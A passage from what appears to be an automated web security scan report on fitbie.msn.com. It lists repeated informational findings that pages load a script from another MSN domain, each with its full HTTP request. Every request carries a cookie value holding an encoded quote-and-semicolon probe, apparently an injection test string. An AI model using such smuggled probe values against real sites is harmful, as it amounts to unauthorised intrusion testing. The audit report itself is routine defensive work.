Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.7. http://fitbie.msn.com/get-fit/cardio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/cardio

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/cardio HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.8. http://fitbie.msn.com/get-fit/fitness-tips previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/fitness-tips

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/fitness-tips HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.9. http://fitbie.msn.com/get-fit/men previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/men

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/men HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.10. http://fitbie.msn.com/get-fit/strength-training previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/strength-training

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/strength-training HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.11. http://fitbie.msn.com/get-fit/tips/3-get-closer-couple-stretches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/tips/3-get-closer-couple-stretches

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/tips/3-get-closer-couple-stretches HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.12. http://fitbie.msn.com/get-fit/tips/6-hard-body-winter-sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/tips/6-hard-body-winter-sports

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/tips/6-hard-body-winter-sports HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.13. http://fitbie.msn.com/get-fit/tips/best-workouts-every-mood/tip/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/tips/best-workouts-every-mood/tip/4

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/tips/best-workouts-every-mood/tip/4 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.14. http://fitbie.msn.com/get-fit/tips/feel-good-fitness-strategies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/tips/feel-good-fitness-strategies

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/tips/feel-good-fitness-strategies HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.15. http://fitbie.msn.com/get-fit/walking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/walking

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/walking HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.16. http://fitbie.msn.com/get-fit/women previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/women

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/women HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607171-1"
Last-Modified: Sun, 13 Feb 2011 14:26:11 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42931
Expires: Mon, 14 Feb 2011 02:26:22 GMT
Date: Sun, 13 Feb 2011 14:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.17. http://fitbie.msn.com/get-fit/yoga previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/get-fit/yoga

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /get-fit/yoga HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.18. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/look-and-feel-thinner/3-abs-myths-busted

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /look-and-feel-thinner/3-abs-myths-busted HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
